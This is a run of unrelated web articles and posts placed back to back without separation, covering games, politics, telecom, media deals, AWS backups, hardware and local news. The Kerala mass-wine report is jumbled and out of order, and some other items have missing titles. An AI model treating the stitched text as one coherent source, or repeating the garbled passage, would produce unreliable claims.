Mostly you need to understand where and why expectations went wrong . Only then can you change the vocabulary of the system to change expectations for the better .
That 's why I welcome quick , rapid feedback . If something does n't work , I want to know that as soon as possible -- before it gets too established to improve , before it confuses too many people , and before people accept it as `` just another quirk . ''
There can be a little pain to start , especially for early adopters , but there 's no substitute for solving real problems in the real world to help you understand exactly what you should have designed in the first place . Maybe next time you 'll get more right .
( This , I believe , is one of those practices which separates real , actual agile development from Big-A-Because-It's-Hip-Agile development : pervasive , ubiquitous feedback gathered and reflected upon to produce small , verifiable changes to development practices designed to improve the process itself . )
If you 're a PC gamer of a certain age , the name Sierra On-Line ( or Sierra Entertainment ) revives memories of some of the most classic point-and-click adventures of the late 20th century . New corporate owner Activision is set to reactivate those memories today , reviving the brand as `` Sierra Games '' and promising new games in the King 's Quest and Geometry Wars franchises .
The new Sierra name will apparently serve as an umbrella for a number of independent studios to reinterpret some classic gaming franchises . The newest King 's Quest entry is being developed for 2015 by The Odd Gentlemen , best known for esoteric puzzle platform game The Misadventures of PB Winterbottom . Geometry Wars 3 : Dimensions , meanwhile , is being worked on by mobile/portable developer Lucid Games for this holiday season . No platforms have been announced for either title .
“ Sierra 's goal is to find and work with gifted up-and-coming indie developers working on their own amazing projects or who are passionate about working on great Sierra IP , ” a Sierra representative told GamesBeat . “ We 're in talks with a large number of other indie devs , and we ca n't wait to share more details with fans in the near future . ”
Sierra was founded as On-Line Systems by Ken and Roberta Williams way back in 1979 , but it sounds like the Williams family will be relatively hands-off in this new incarnation of the company .
`` We 're very proud of what we created all those years ago with Sierra Online , and today 's news about carrying Sierra forward as an indie-specific brand is very encouraging , '' Sierra founder Ken Williams said in a statement obtained by Eurogamer . `` We look forward to seeing Sierra 's independent spirit live on , and are especially excited to see what The Odd Gentlemen will do with King 's Quest . ''
After being renamed Sierra On-Line in 1982 , the studio was passed around to a number of corporate owners throughout the '90s and early 2000s before finally ending up as part of Activision after the mega-publisher 's merger with Vivendi Games . That merger served as something of a death sentence for the brand , which has remained silent since 2008 .
Though best known for adventure series like King 's Quest , Space Quest , Leisure Suit Larry , and Gabriel Knight , Sierra 's history also includes titles in a number of different genres , such as the city-building Caesar series , dogfighting sim Aces of the Pacific , and even open-world sandbox game The Incredible Hulk : Ultimate Destruction . We 're hoping today 's announcement means an imminent return for the Rube Goldberg-esque puzzles of Sierra 's The Incredible Machine series .
Jazz singer Billie Holiday is shown in this 1949 photo . Holiday first recorded `` Strange Fruit '' in 1939 . ( Photo11 : Herman Leonard )
A public relations firm called `` Strange Fruit PR '' in Austin , Texas , apologized and changed their company name after it was widely criticized on Twitter for being racially insensitive .
The firm changed the company name to Perennial Public Relations , co-owners Mary Mickel and Ali Slutsky wrote in a statement Tuesday to USA TODAY Network .
`` We sincerely apologize to those offended by the former name of our firm , '' they wrote . `` In no way did we ever intend for the name of our firm to offend nor infer any implication of racism . ''
`` Strange Fruit '' is the name of a famous 1939 Billie Holiday song about the lynching of black men and women in the south during the Jim Crow era . Lynching is never explicitly mentioned in the song , but the `` fruit '' hanging from the trees refers to African-American bodies .
`` Southern trees bear a strange fruit , '' the song begins . `` Blood on the leaves and blood at the root , Black body swinging in the Southern breeze , Strange fruit hanging from the poplar trees . ''
Twitter users implored the public relations company , which handles food and hospitality clients , to reconsider their name .
Why would a PUBLIC RELATIONS FIRM choose a name that represents black people being lynched/murdered ? Have you no class ? @ StrangeFruitPR — My Cuppa Chai ( @ mycuppachai ) December 7 , 2014
What about the proclamation `` Black bodies swinging from the trees '' helps @ StrangeFruitPR promote hospitality ? # BlackLivesMatter — Call me Suga ( @ MissEve ) December 7 , 2014
The PR firm disabled its Twitter account , Facebook page and website under the old name .
Mickel and Slutsky knew about the song when they started the company in 2012 , according to a statement in the Austin American-Statesman , but thought enough timed had passed that people would not associate it with their company .
`` Had we known the horrible connotations this name evokes , we would have never chosen it in the first place . We just did n't get it , but now we do , '' Mickel wrote .
Follow @ lagrisham on Twitter
Read or Share this story : http : //usat.ly/1A8oreO
Happy Friday ! We deleted all your data !
Phil Blocked Unblock Follow Mar 31 , 2017
Update : I got my data back ! RDS is very confusing ( what else is new with an AWS service ? ) .
Update : The automatic manual snapshot of my database created just before it was deleted .
I 'm building this cool app . It scrapes a bunch of interesting data , does some machine learning and natural language processing magic , blends in some user-generated content , and… does something useful . It 's a work in progress .
psql : could not translate hostname for my database : Name or service not known
Over the last two months I 've been stuffing my Amazon RDS Postgresql instance with a daily scrape of raw data , plus thousands of manually parsed pieces of training data . It 's ~~on the cloud~~ , but do n't worry ! I have daily snapshot backups !
Amazon RDS event log this morning : “ DB instance shutdown ” , then “ DB instance deleted ” .
I could n't connect to my database this morning . A quick call with support revealed that the credit card on file had been declined , and I was past due on charges . Twenty dollars worth ! The support rep un-suspended my account for another month , I added a new card and paid off the charges , and was back in .
Amazon RDS FAQ : “ Automated backups are deleted with the DB Instance is deleted . Only manually created DB snapshots are retained after the DB instance is deleted . ”
My RDS instance had vanished with barely a trace : only a few notes in the events log about its deletion . It seems a bit harsh to me to immediately start deleting instances on account suspension . A grace period would be nice . Surely there 's a grace period before deleting S3 objects , where RDS snapshots are stored ?
It does n't matter , because RDS deletes all your automatic snapshots when you delete your instance . Or when they delete it , because your account was suspended for a few hours .
The end . Happy Friday .
Update : Amazon did n't delete all my data when they suspended my account . I did n't find a written policy guaranteeing this , but at least in my case , AWS automatically took a manual snapshot before terminating my RDS instance , and manual snapshots do n't get automatically deleted . I did n't notice the automatic manual snapshot in the list with my manual manual snapshots from January .
It was a roller-coaster of a day , but I 'm now happily back up with all the data I had before the suspension . Phew !
This weekend marks the halfway point in the presidential primary season . It began with the Iowa caucuses on February 1st and ends when California and four other states weigh in on June 7th , when one-eighth of the total number of delegates will be awarded . In most presidential years , states clamor to move to the front to the pack , where Iowa and New Hampshire garner all the media attention and seem to be the most important states in the nominating process . But this time around states at the end might turn out to be the pivotal ones . Two weeks ago , Hillary Clinton and Donald Trump seemed on the verge of locking up their respective party nominations , but now appears that we may not go to know who the winners are until all the voters have had a chance to weigh in , or even until the party conventions in July .
At the halfway point in the primary season , both political parties are in uncharted territory . Four of the five remaining candidates have significant flaws . Donald Trump 's negatives are off the charts . Based upon the most recent Bloomberg Politics poll , he is viewed unfavorably by 68 % of the national electorate , against favorable rating of 29 % . Ted Cruz is not far behind , with an unfavorable/favorable rating of 55 % to 32 % . On the Democrat side , Hillary Clinton 's failure to put away a 74 year-old socialist Jew from Vermont is manifest in her own unfavorable/favorable rating of 53 % to 44 % , in contrast with Bernie Sanders ' standing as the only remaining candidate viewed positively by the American electorate with ratings of 52 % favorable vs. 41 % unfavorable .
After putting together a winning streak , winning or tying six primaries in a row in mid-March , Hillary has lost the last five contests , and now looks to be pummeled by Bernie Sanders in Wisconsin this Tuesday . The polling there is ominous . According to the most recent Fox Business poll of Wisconsin voters , Sanders leads Clinton by almost 50 points among voters 45 years old and younger . She might remain the presumptive Democrat nominee , but her lead is getting smaller and smaller in the voted delegate column , and she knows better than anyone else that the Superdelegate count -- where she holds a commanding lead -- is ephemeral . She had the Superdelegates eight years ago . Until she did n't .
Part of Sanders ' success rests on the simplicity of his message : the political and economic system is rigged in favor of the wealthy , and it is time that we did something about it . As the certainty of her winning the nomination has faded , Clinton has become increasingly tetchy in the face of Sanders ' narrative that she has been corrupted by Wall Street and corporate money . But railing against Bernie 's `` lies '' as she did this week will only exacerbate her problem . The simple truth is that luring big money has been an essential element of Clintonism -- think Johnny Chung , Mark Rich and the Lincoln Bedroom -- and Bill Clinton boasted that winning over Wall Street to the Democratic Party was a major success of his New Democrat movement , even if the price paid was Wall Street deregulation and the 2008 financial collapse . The money , for better or worse , is part of the Clinton brand .
It has become conventional wisdom to suggest that Hillary Clinton does best when her back is against the wall , but another way of saying that is that she does best when she is losing . Suffice it to say , that is a risky strategy . If she loses big in Wisconsin , and her poll numbers continue to erode in New York as they have been , by the end of the month her lead in the voted delegate count could shrink to the point where California will actually matter . And no one should be fooled by the notion that the Superdelegates provide a buffer . At the end of the day , it will be next to impossible for Hillary to win the nomination if she loses the voted delegate count . It would be just too un-democratic .
At the midpoint in a movie script , the plot takes a major turn , and this appears to be the case as we reach the halfway point in the Republican race . For the better part of the past year , it has become a routine media riff to predict why the [ fill in the blank ] comment by Donald Trump will be his undoing . He insulted Megan Kelly . He insulted John McCain . He insulted Mexico . He insulted the entire Muslim world . Yet time and time again , the New York businessman turned reality TV star proved his resilience as his poll numbers rose each time the media predicted his demise .
But the man who has single handedly turned an entire primary season into a reality show may have finally succumbed to reality . This week , he may have finally done it . He may have finally made enough missteps that even his loyal base may begin to see through the facade of a man who has no earthly business being President of the United States . First , he had an interview with the Washington Post . It was a banal non-event , and certainly nothing that on its own would have a material impact on the race . He said nothing that he had not said at his rallies . But that was the point . Given the chance to pivot , to begin to demonstrate in front of the mavens of modern journalism that he is a serious man , he could not rise to the occasion . Behind closed doors he doubled down on why it mattered what size his hands are . He could not say what he would do about ISIS , only that it was critically important that when faced with Marco Rubio 's genitalia innuendo , he had to strike back .
Then there was an interview with the New York Times . Perhaps chastened by his performance days earlier with the Post , Trump stayed on message and his foreign policy answers were actually interesting . He makes a strong case for the value of strategic unpredictability in international affairs , but what was evident once again was that every response was off the cuff . Given the opportunity to demonstrate the sound gravitas of his realpolitik worldview , it was just Donald Trump , riffing with the media as he has been riffing for the past nine months .
Then it all came to a head in a town hall interview with Chris Matthews . Faced with the question from Matthews as to whether a woman who has an abortion should be punished in the event that abortion was made illegal , Donald Trump looked visibly perplexed . He stumbled for an answer , before finally concluding that if abortion is murder , the woman who conspires in that murder must face punishment . It was not the successive days of cleaning up his answer that was notable , but rather the fact that after nearly a year running for president , as in his interviews with the Post and the Times , Donald Trump was still making up his answers as he went along .
Over the past week , the price of Trump 's lazy , extemporaneous approach to politics started to become more tangible . The Republican primary season has been a riveting reality show , and as such it should have been no surprise that a reality star might excel at the give and take , the punch and counterpunch . But the truth is that the primary season that we follow every day is just one step in how the delegate selection process works . There are , as it turns out , each state holds its own convention , or similar process , to select the actual delegates that will attend the national party conventions , and each of these delegates are individuals whose political views and commitments may not reflect the will of the primary or caucus voters in that state . But even more to the point , the Democratic and Republican Parties are private organizations that make their own rules , and as in any game , the rules are important .
Last week , Ted Cruz schooled Donald Trump on the real world of Republican Party politics . Trump won the Louisiana primary back on March 5th , but last week Cruz emerged from the Louisiana delegate selection process with the largest share of the actual delegates . Perhaps most important , Cruz won five of the six seats assigned to Louisiana on the important rules committee for the national convention . Each state , as it turns out , has its own convention and own rules around delegate selection . Delegates who may be bound to Trump on the first ballot will quickly abandon him on subsequent ballots . And , perhaps most important , the rules will not be established until the first days of the convention , by a rules committee to be determined through actions at each state convention , and unsullied by the results of the primaries and caucuses earlier on in the process .
And it gets worse . This week , in the face of a concerted `` No Trump '' backlash , Donald Trump appeared to retreat from his vow to support the ultimate Republican nominee , if it is not him . Trump 's words threw into doubt the status of the 50 delegates Trump won when he swept the South Carolina primary in February . South Carolina rules require a party loyalty pledge and Trump 's petulance could cost him those critical 50 delegates and move his first ballot delegate count in the wrong direction .
At the midpoint in this saga , Donald Trump appears to be suffering what could be a cataclysmic reversal , one that could rewrite the direction of a drama that has kept us glued for so many months . The reversals in delegate commitments that Trump has experienced were not accidental . The campaigns that are being run by Ted Cruz and Donald Trump are complete opposites . Ted Cruz is a dedicated and cunning politician who understands that victory in politics is about blocking and tackling . It is more about work that goes on behind the scenes involving thousands of people than it is how one man performs in front of a camera . The Cruz team , led by Political Director Mark Campbell , has spent more than a year paying painstaking detail to the rules of the game in every state and the critical players in every county . They know exactly what they are doing , and they know that Donald Trump does not .
The irony is that Donald Trump is supposed to be the businessman . It is the cornerstone of his campaign narrative . He will fix America , he will make America great again , because he can set goals , define a strategy , build a team and execute a plan -- in short do all those things that people in business do that people in government do not . But this week it has all been laid bare . As it turns out , there is no strategy . There is no team . And there is no plan . There is just Donald Trump , riffing away as the cameras roll . And as we learned this week , the more serious the issues get , the more specific the questions , the more he is adrift .
Time will tell if Trump can recover , one more time , and , perhaps more important , if he has the potential to be more than he has demonstrated to date . But we have reached the midpoint in the script , and this is where the protagonist is supposed to suffer a reversal , and on the Republican side it appears that he has .
For both the Democrats and Republicans , Wisconsin will be a pivotal day . As we pass the halfway point , both party frontrunners are struggling to sustain their advantage , both are vulnerable . As much as people have been girding themselves for a Clinton vs. Trump matchup -- in particular the candidates themselves -- it is still possible that the candidates in the fall will be Bernie Sanders and Ted Cruz . That would be an unbelievable outcome . Unbelievable , but not beyond the realm of possibility .
Charter CEO Tom Rutledge met with President Donald Trump today , and he made a splashy promise to `` invest $ 25 billion in broadband infrastructure and technology in the next four years . ''
But Charter , the second biggest US cable company after Comcast , was already planning broadband expansions during the Obama administration . When Charter purchased Time Warner Cable and Bright House Networks 10 months ago , it agreed to a merger condition requiring it to bring 60Mbps download speeds to an additional two million customer locations .
The spending Charter promised Trump today wo n't guarantee broadband access for any additional customers beyond what the company already committed to during the Obama years .
`` This is not tied to a number of new broadband customers . This is an overall broadband infrastructure and technology investment commitment over the next four years , '' a Charter spokesperson told Ars today when we asked how many additional customers will get service .
Charter 's statement did not point to any specific Trump policies that would spur increased investment , and the company did not say when it came up with this investment plan . Rutledge said this is the `` right regulatory environment and right tax climate to make major infrastructure investments . '' The $ 25 billion spending is `` predicated on the kind of regulatory consistency and efficiency that we expect , '' he said .
Companies like AT & T and Sprint owner SoftBank have been quick to link investment plans to Trump policies , whether there 's any real connection or not , as they seek more business-friendly regulation . Charter 's statement attributed its investment plan to `` confidence in the deregulatory policies of the Administration and the FCC . ''
Rutledge said he expects to hire 20,000 new US employees over the next four years—but that 's a promise Charter already made in 2015 when it was seeking approval to buy Time Warner Cable , The Los Angeles Times wrote today .
`` In addition , we are committed to moving all of the former Time Warner Cable customer service calls from offshore to the United States , consistent with our approach at Charter , and will create new jobs to handle those calls , '' Charter said .
In this too , Charter was already pledging to `` return offshore jobs to America '' when it announced the merger in May 2015 .
Crunching the numbers
Figuring out how the $ 25 billion in spending compares to previous levels is tricky . In calendar year 2016 , Charter and its new subsidiaries spent a total of $ 7.5 billion on capital expenditures . This is a `` pro forma '' figure that includes TWC and Bright House spending from the months before the merger was completed .
Excluding money related to the post-merger transition , the total capital expenditures of Charter and subsidiaries were $ 7.1 billion in 2016 . Using the $ 7.1 billion figure , we could expect $ 28.4 billion in capital spending over four years if there are no increases .
However , Charter told Ars that the $ 25 billion promise is `` specific to broadband infrastructure and technology investment '' and different from the total capital expenditure figure .
We asked Charter what the spending in these categories was in 2016 . The company did not give us 2016 figures , but it said that over the past three years , Charter `` invested $ 16 billion in infrastructure and technology . '' That 's a pro forma figure that includes TWC and Bright House spending from before the merger , Charter said .
That would indicate $ 5.3 billion in annual spending over the past three years . The $ 25 billion promise ( $ 6.25 billion a year ) would then be a real increase in annual infrastructure and technology spending , according to these figures . But since we do n't know the exact 2016 figure , we ca n't say if it 's an increase or decrease over last year .
Charter 's financial statements break capital spending down between customer premise equipment , scalable infrastructure , line extensions , upgrade/rebuild , and support capital . We asked Charter which of these are included in the $ 25 billion promise and will provide an update if we get one . You can see the numbers in this next image—we 're guessing that `` customer premise equipment '' such as cable modems and set-top boxes might be excluded from the $ 25 billion promise .
FCC may undo commitment that boosts competition
While Charter 's announcement did n't include any bad news , it 's disappointing that the company would tout new investment without committing to serving any additional customers . Perhaps the company will improve speed and reliability for existing customers beyond what was already planned before Trump was elected , but the company did n't make any specific promise to do that , either .
Last year 's merger commitment to bring 60Mbps speeds to two million new residential and small business locations included a pledge that at least one million of those would be in areas served by at least one other high-speed provider . This condition was designed to increase competition . But new FCC Chairman Ajit Pai is planning to eliminate the `` overbuilding '' requirement while keeping the overall requirement of two million locations in place .
Pai issued a statement praising Charter today . `` I 'm pleased to see that our investment-friendly policies , along with the Administration 's overall regulatory approach , are already producing results , '' Pai said .
Disclosure : The Advance/Newhouse Partnership , which owns about 13 percent of Charter , is part of Advance Publications . Advance Publications owns Condé Nast , which owns Ars Technica .
Being my first time in reddit gifts I sent my gift during the first hour of so and then saw the days go by and my santa did n't even touch my adress .
Then my rematch santa came along , make contact right away and even though the winter tried to stop him he still managed to sent me a wonderful gift .
With any of the 3 things in that cardboard purse that amazon sends I would have been happy ... but I got all three of them .
If you analize the gifts I 've got they are an instruction book oh how to pick locks , the greatest novel about government conspiracy and ( as stated on the box ) `` The greatest metal album of all time '' .
I 'll be making my very own tinfoil hat and soon make the news .
Crazy local redditor robs the national reserve Crazy local thief and redditor claims the government is pulling the strings Tin foil hat found at the airport . All flights are delayed
MUAHAHAHAAHA ... ok
Ok , in a bit more serious tone , AWESOME rematch santa . wherever you are , you rock . Thank you for being an awesome person and I hope you had an excelent reddit gifts : )
I was so excited about the hockey exchange , I live in the UK where hockey is field hockey and played mostly by women - and mostly in school PE lessons , nobody gets why I love ice hockey so much or cares about it .
But I grew up on the ice as a figure skater , and was always so jealous watching the boys learn hockey . I have a local team ( Go London Raiders ! ) but the Blackhawks have my heart , for a series of complicated reasons I wo n't go into . Suffice to say , I was psyched for the hockey exchange .
Come matching day , I got a really fantastic giftee and had an awesome time finding some gifts for him . And I got the most amazing santa . Seriously . She kept sending me lovely messages and kept me completely up to date with what was happening , which was so nice .
And she sent me the most amazing gifts .
It really touched me to see the effort she 'd clearly gone to to collect things I 'd like , and each package I opened just made me more and more teary eyed . ( Seriously , I love hockey . This exchange was a big deal to me . ) And do n't get me started on the hand made card , that was just too fantastic for me to deal with .
Anyway , inside the wonderfully wrapped gifts ( check out the photos I 've posted for full glorious detail , words do n't do these gifts justice I promise you ! ! ) was more Blackhawks swag than I could ever hope to own . It 's really difficult to get your hands on anything over here , and that which will be shipped comes with truly outrageous shipping costs !
I 'm now the proud owner of a fab Blackhawks t-shirt ( which fits perfectly as a pyjama top , which is how I 'm wearing it as games tend to happen at 1am for me ! ) , a Blackhawks lanyard and keyring . It 's particularly wonderful to have gifts that you love , relate to something you adore and are actually useful !
So thank you so much to my santa , it was a better exchange than I can possibly communicate .
I 've been wearing the t-shirt when the Hawks play - I stayed up until 4am watching the game last night ( damn time zones ! ! ) , and I 'm pretty sure that the t-shirt is the reason we were n't eliminated .
Thank you .
A top British Prime Minister advisor , who helped design the country 's controversial Internet filtering program , has been arrested for possessing child pornography . Patrick Rock was arrested at his home a day after Prime Minister David Cameron 's office learned about the investigation .
“ This is an ongoing investigation so it would not be appropriate to comment further , but the Prime Minister believes that child abuse imagery is abhorrent and that anyone involved with it should be properly dealt with under the law , ” said a spokesperson .
Britain has come under fire for its Internet filtering program , which can inadvertently block sensitive culture topics that overlap with common porn terms . The program accidentally “ led to the creation of filters that not only cover hardcore pornography , but hate speech , self-harm , drugs , alcohol , tobacco , dating , nudity , violence , gambling , social networking , file-sharing , games and more , ” explained Wired UK .
Despite the embarrassing arrest , there is no announced plan to revise the Internet filtering program . “ Patrick Rock was one of a number of advisers and officials involved in dealing with this issue but the work was led by somebody else , and decisions were taken by ministers . ”
[ Image Credit : Flickr user UK Department for International Development ]
20th Century Fox is rebooting its 2003 historical fantasy film “ The League of Extraordinary Gentlemen ” with John Davis on board to produce through his Davis Entertainment banner .
Jayson Rothwell has been hired to write “ The League of Extraordinary Gentlemen. ” Ira Napoliello and Matt Reilly are overseeing the remake , based on Alan Moore and Kevin O'Neill 's graphic novel of the same name , centering on Victorian-era literary characters such as Captain Nemo , the Invisible Man , Dr. Jekyll and Mr. Hyde teaming to fight a common enemy .
A TV series was in development in 2013 with “ Green Lantern ” writer Michael Green on board as showrunner and exec producer alongside Erwin Stoff . Fox made a put pilot commitment but the show was not ordered to series .
The feature film starred Sean Connery as Allan Quatermain ; it was the thesp 's final live-action movie before he retired . The studio had planned for “ League ” to become a franchise but the worldwide gross reached only $ 180 million .
“ The League of Extraordinary Gentlemen ” comic book series launched in 1999 .
Rothwell is repped by WME .
News of the reboot was first reported by The Tracking Board .
Univision has won the auction for Gawker Media .
The TV network and digital publisher has agreed to pay $ 135 million for the bankrupt blog network , according to a person familiar with the deal .
Univision 's offer will encompass all seven of Gawker Media 's sites , including Gawker.com
Ziff Davis and Univision were the only two bidders for Gawker , which filed for bankruptcy after Hulk Hogan and Peter Thiel won a $ 140 million judgment in a privacy case . Ziff Davis had originally offered $ 90 million for Gawker Media .
Here 's a statement from Gawker Media owner Nick Denton : `` Gawker Media Group has agreed this evening to sell our business and popular brands to Univision , one of America 's largest media companies that is rapidly assembling the leading digital media group for millennial and multicultural audiences . I am pleased that our employees are protected and will continue their work under new ownership — disentangled from the legal campaign against the company . We could not have picked an acquirer more devoted to vibrant journalism . ''
Mark Patricof , the Houlihan Lokey banker who represented Gawker Media , confirmed the sale price .
`` The outcome exceeded our expectations . Both parties put in an awful lot of work , and Ziff Davis deserves credit for their effort , '' Patricof said . `` But ultimately Univision prevailed , and both sides are happy with the outcome . ''
The deal wo n't be official for a bit . For starters , a U.S. bankruptcy court judge needs to sign off on the transaction . When it is final , the judgment funds will be set aside while Gawker appeals its court case ; eventually the money will go to the side that wins .
Whatever the result of the case , the auction is a disappointing conclusion for Denton , who founded the company in 2002 .
Last year , as rival media companies like Vice , BuzzFeed and Vox Media ( which owns this site ) were raising money at increasingly high valuations , Denton was arguing that his company was worth $ 250 million or more .
Univision , which until recently was best known as a Spanish-language TV network , has been expanding its digital reach in recent years by acquiring satire site The Onion and The Root , a publication aimed at African-Americans .
And earlier this year it picked up full ownership of Fusion , the network and digital publisher aimed at millennials , which it originally launched in conjunction with Disney .
Nick Denton discusses the Hulk Hogan sex tape in June
GRAND RAPIDS , Mich. — Founders Brewing Company is taking steps to get the city 's permission to permanently affix a large American flag to the roof of its existing restaurant space .
In an application submitted to the Planning Commission in November , the brewing company says the flag 's purpose will be to “ help draw in local customers and out of town visitors to Founders Brewing and the other local establishments in the area . ”
The city of Grand Rapids currently allows flags up to 40 square feet in size to be installed in public locations . The flag Founders is proposing would be 375 square feet , mounted on top of their existing building at 235 Grandville SW .
The Planning Commission is scheduled to look at a revised version of the proposal at their upcoming January 12th meeting .
AMD has been showcasing laptops based on its upcoming Trinity processor at CES this week . The company is hoping to bring thin and light Ultrabook-style machines—though AMD calls them `` ultrathins , '' to avoid Intel 's trademarks—to market for as little as $ 500 . This would substantially undercut Intel-powered Ultrabooks , which currently start at $ 800 . Intel hopes to reduce the Ultrabook entry price to $ 700 by the end of the year .
Each Trinity chip will contain a CPU and a GPU . The CPU will be a second generation Bulldozer core , codenamed Piledriver . The GPU portion will be based on AMD 's Southern Islands architecture , which made its debut late in 2011 with the launch of the Radeon HD 7970 .
There will be two lines of Trinity chips ; low power 17 W ones for ultrathins , and higher power 35 W ones for standard laptops . The ultrathin-oriented chips will have about the same performance as AMD 's current Llano A-series chips , but with half the power draw . The high-power chips will have a 25 percent faster CPU and a 50 percent faster GPU .
AMD did not say when the chips would be released , but the company intends to disclose more about its release strategy at its financial analyst meeting in February .
In our first hour , Morris Berman on . Speaking just after the release of his recent book , , this talk is heavily influenced by his published collection of essays entitled ' A Question of Values ' .
Focusing on US life , Berman looks at a wide range of topics , from the commercially controlled media bubble in which so many US citizens live , the fact that US residents consume twice as much anti-depression medication as the rest of the humanity combined to the fact that president Obama has now claimed the right to summarily execute anyone anywhere , for any reason , or indeed for no reason at all . He criticizes public discourse about US society as superficial not only because it is too issue-specific and lacks the 'bigger picture ' of multiple interlocking problems , but also because it lacks an understanding of how US citizens behave on a daily basis . Citing one academic study that concluded there was a '48 % drop ' in empathy over the last 30 years , he is unflinching in exposing what he terms 'the sheer cruelty of the American soul ' . While his conclusions are stark , his evidence is trenchant .
Thanks to Pirate TV Seattle for the Morris Berman recording .
Berman 's speech continues until just into our second hour , after which we hear a couple of questions from the ensuing Q & A . We conclude by reading chapter 4 of David Graeber 's Debt , The First 5000 Years , entitled . He surveys the historical evidence available about the impact of money and debt , and its tendency to create a hierarchy in which money masters cruelly dictate terms to debt slaves . Citing biblical and other evidence , he recalls that mass debt forgiveness was sometimes necessary to prevent social collapse . What , he asks , do religions have to say about the morality of the marketplace , and why do they frame their message in economic terms - e.g . Christ the Login Required )
This patch introduces a new difficulty level which is mainly meant to be fun… for your enemies . Face never seen before traps , bosses and perils . Stem the unending onslaught of new enemy types and encounters . You will be able to upload your completed runs on the website soon ( tm ) .
New difficulty : Inferno
Inferno is a new difficulty which lets you play against a truly merciless onslaught of foes . This is no longer speed run country , this is for realsies . Many enemies are roughly as strong as on Mental or Insane , but they will occur in greater numbers and with new abilities , weapons and tools to kill your dreams . A large amount of new traps , counter attacks and mechanics have been added to strike fear and hoplesness into the hearts of even the most seasoned CP veterans . Inferno does not become more difficult over time , but deaths will still be punished with experience loss and counter attacks .
This time it is not just about being fast . It is about survival . You will have to rethink many known encounters and come up with new strategies for all major events and boss fights . I am looking forward to seeing how long it takes for you to beat it and how the times will look like . After all there are some truely amazing players in this community .
There is also a mission timer , like in Mental , and you will be able to upload your best runs to the online leaderboards in the near future . Thenarden is currently working on expanding the website to make room for your runs .
Inferno is a new difficulty which lets you play against a truly merciless onslaught of foes . This is no longer speed run country , this is for realsies . Many enemies are roughly as strong as on Mental or Insane , but they will occur in greater numbers and with new abilities , weapons and tools to kill your dreams . A large amount of new traps , counter attacks and mechanics have been added to strike fear and hoplesness into the hearts of even the most seasoned CP veterans . Inferno does not become more difficult over time , but deaths will still be punished with experience loss and counter attacks . This time it is not just about being fast . It is about survival . You will have to rethink many known encounters and come up with new strategies for all major events and boss fights . I am looking forward to seeing how long it takes for you to beat it and how the times will look like . After all there are some truely amazing players in this community . There is also a mission timer , like in Mental , and you will be able to upload your best runs to the online leaderboards in the near future . Thenarden is currently working on expanding the website to make room for your runs . Leviathan Boss Battle : Slightly increased the average amount of Elite Vikings which help you defeat the Leviathan .
Overdrive : self-damage increased 20 % - > 25 % , energy cost reduced 90- > 60 . Activating Overdrive should be a decision about life and cooldowns and less about energy .
Transmissions ( “ Large Zerg Force Incoming ” etc ) will no longer overlap each other that much ( experimental change ) .
Players can now select any difficulty in solo mode regardless of their rank and other previous requirements for them .
Fixed some ultra rare pathing problems .
Fixed a bug with minion damage bonus from Power Cubes .
Various minor polish .
Browse all CP2 Patch Notes - Donate to Crap Patrol 2 - Online Hall of Fame
Cleveland city councilman Matt Zone is stepping up to the plate . In November 2016 , he became president of the National League of Cities — a nationwide association of 120,000 elected officials and 2,300 cities that helps build better communities . That 's a big deal , since the last Clevelander to hold the post was legendary politician George Voinovich , more than three decades ago . Now Zone leads the organization 's lobbying and publicity efforts as President Donald Trump embarks on the first 100 days of his administration . We sat down with the councilman for a chat .
On leadership Sometimes people get elected to office , and they get bunkered down with dealing with constitute services all the time . You almost become like that factory worker . I always wanted to push the boundaries of what a policymaker could be and help not only the city learn and grow from that , but the community that I represent .
On Voinovich When Cleveland hosted the Rock and Roll Hall of Fame Induction Ceremony in 2015 , we had this moment where I saw him and his wife , Janet . I said , “ You know , Senator , I want to thank you ” — because he wrote a support letter for me . I said , “ I was successful . I was elected second vice president of the National League of Cities. ” He instantly teared up . He said local government work was the most rewarding work he did in his political career . It was one of those moments , you know , where I had the big lump in the throat . He has a tear in his eye , like a grandfather , and then we hugged .
On Trump I did n't support Donald Trump for president . But he was nominated in my hometown . I think we 'll have some sort of connection . And that first year is really going to set up how the next three years of this administration working with our organization unfolds . So I 'm going to be very diplomatic . I 'm going to work with him on issues where I think there is consensus .
On bipartisanship Right now , Congress is hyper-partisan . So if you take a position that 's contrary to the Republican or Democratic party , you 're viewed as the other , right ? What [ the League of Cities does ] very skillfully , unlike Congress , we have a diverse member base where we can come to consensus on issues .
On why his position matters for Cleveland There are going to be many opportunities for my position to benefit , not only Cleveland , but Northeast Ohio . As I am traveling the country , speaking at conferences , writing op-eds in a number of papers across America , I 'm going to be telling the Cleveland story , the Cleveland spirit . How we can come back and reinvent ourselves from an old , urban legacy city into what we 've become today .
Advertisement
You are therefore directed to clarify the above point '' .The application that was returned in the first week of April has not elicited a reply from the diocese yet . `` The requested quantity is not in proportion with the number of priests . THIRUVANANTHAPURAM : The excise department returned an application from M Soosai Pakiam , the Latin Archbishop of Thiruvananthapuram , seeking enhancement in the annual quota for producing wine used for mass , from the existing 250 litres to 2,500 litres , saying it found the demand prima facie unreasonable.In the reply given by the joint commissioner of excise , accessed by TOI under RTI Act , the department said that the increase in quota sought is disproportionate to the number of priests.The application from Soosai Pakiam , who is also president of Kerala Catholic Bishops Council and a vocal votary of prohibition , says that there are 408 priests now and so the archdiocese should be permitted to brew 2,500 litres of wine per year.In his reply , the joint excise commissioner 's letter said , `` The number of total priests has been enhanced by 77 % but the request is to enhance annual quantity of mass wine by 900 % .
Australia is currently one of the largest markets for energy storage , which is why it 's not surprising that it is one of the first to receive Tesla 's Powerwall 2 home battery pack , albeit late .
We have learned that the first installations have started down under and one of the first homeowners to receive the device gave an account of the process .
Australia is a popular market for energy storage both at the grid level due to the instability of its grid , which prompted the recent bid to quickly deploy over 100 MWh of energy storage , but also at the residential level behind-the-meter .
The country has the world 's highest per capita penetration of rooftop solar with 15 % of households using solar for a total of 1.5 million households across the country .
One of those homeowners with solar is Michael V. from New South Wales on the Whirlpool forum .
He described the installation of his new Powerwall 2 this week . The first thing he noticed is the weight . Tesla lists the weight of the pack at “ 264.4 lb / 120 kg ” , but the weight of the packaging was different :
The Powerwall 2 can be both ground mounted or wall mounted . In this case , they were going to ground mount it , but they also needed to secure it on the wall to prevent it from tipping over .
They had difficulties finding the studs because of the plastic cladding in Michael 's house so they ended up using plywood to spread the load :
It took about two hours to secure the battery pack and move on to connecting it . The installers were from the Downer , an Australia engineer firm and certified Tesla Powerwall installer . They told Michael that it was their first installation and they had only practiced on a prototype at this point .
